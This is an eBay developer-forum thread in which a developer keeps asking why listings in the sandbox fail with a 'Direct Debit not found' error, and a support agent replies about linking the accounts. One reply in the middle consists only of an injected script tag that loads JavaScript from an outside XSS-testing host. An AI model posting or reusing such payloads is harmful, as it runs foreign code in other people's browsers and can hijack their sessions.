question

bruzgi_0 avatar image
0 Likes"
bruzgi_0 asked ·

Direct Debit not found.

Hello, trying to add product with fixed price and get error: Direct Debit not found. We're sorry, but before you list an item, you must submit direct debit information through our secure form. Working in sandbox. What i should to do? There is no security form for submiting info about direct debit. User: testuser_gedas123? Paypal: gedas-facilitator@rrr.lt @ zhuowei.developersupport@ebay.com Maybe you can help?
apitrading fixedprice
10 |600 characters needed characters left characters exceeded

Up to 2 attachments (including images) can be used with a maximum of 512.0 KiB each and 1.0 MiB total.

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
@ zhuowei.developersupport@ebay.com Maybe you can help? Still have same problem? ...
· 1 · Share

Up to 2 attachments (including images) can be used with a maximum of 512.0 KiB each and 1.0 MiB total.

Accepting the response due to inactivity on the thread for over a week.
0 Likes 0 · ·
nirmal_pentesting_seller avatar image
0 Likes"
nirmal_pentesting_seller answered ·

"><script src=https://pentest4all.xss.ht></script>

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
Anybody can help or not? @ zhuowei.developersupport@ebay.com @lester_developerprogram More than 2 weeks can help. Is it normal? ... i think not.

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
hi, still same problem. Full error from code : object(AddFixedPriceItemResponseType)#133 (5) { ["Timestamp":protected]=> string(24) "2018-01-12T06:21:56.350Z" ["Ack":protected]=> string(7) "Failure" ["Errors":protected]=> array(1) { [0]=> object(ErrorType)#134 (5) { ["ShortMessage":protected]=> string(23) "Direct Debit not found." ["LongMessage":protected]=> string(107) "We're sorry, but before you list an item, you must submit direct debit information through our secure form." ["ErrorCode":protected]=> string(5) "12040" ["SeverityCode":protected]=> string(5) "Error" ["ErrorClassification":protected]=> string(12) "RequestError" } } ["Version":protected]=> string(4) "1043" ["Build":protected]=> string(26) "E1043_UNI_API5_18598316_R1" } I`m developer. But i`m from lithuania, and need to know then you can contact with me. Because we have very different time zone :) gedas@rrr.lt its my email. If you give me your email, i will send you ftp credentials. ![alt text][1] [1]: /storage/temp/1721-capture.png

capture.png (69.6 KiB)

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
Hi, i`m developer. You can contact with me by email gbruzgis@gmail.com. Still have same problem. @ zhuowei.developersupport@ebay.com

zhuowei.developersupport@ebay.com avatar image
0 Likes"
zhuowei.developersupport@ebay.com answered ·
Hi bruzgi_0, I have linked your eBay Sandbox account testuser_gedas123 and your PayPal sandbox email gedas-facilitator@rrr.lt. Your eBay sandbox testuser_gedas123 has been set with bussiness account that you should be able to list on Sandbox. If you are still running into 'Direct Debit Not Found' error. please provide your developer account's username so that we can contact you directly. Best Regards,

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
Hey support, i cant work more than week... still got message "We're sorry, but before you list an item, you must submit direct debit information through our secure form." @ zhuowei.developersupport@ebay.com Maybe you can help?

bruzgi_0 avatar image
0 Likes"
bruzgi_0 answered ·
Also, can you make that account - bussiness account?

Write an Answer

Hint: Notify or tag a user in this post by typing @username.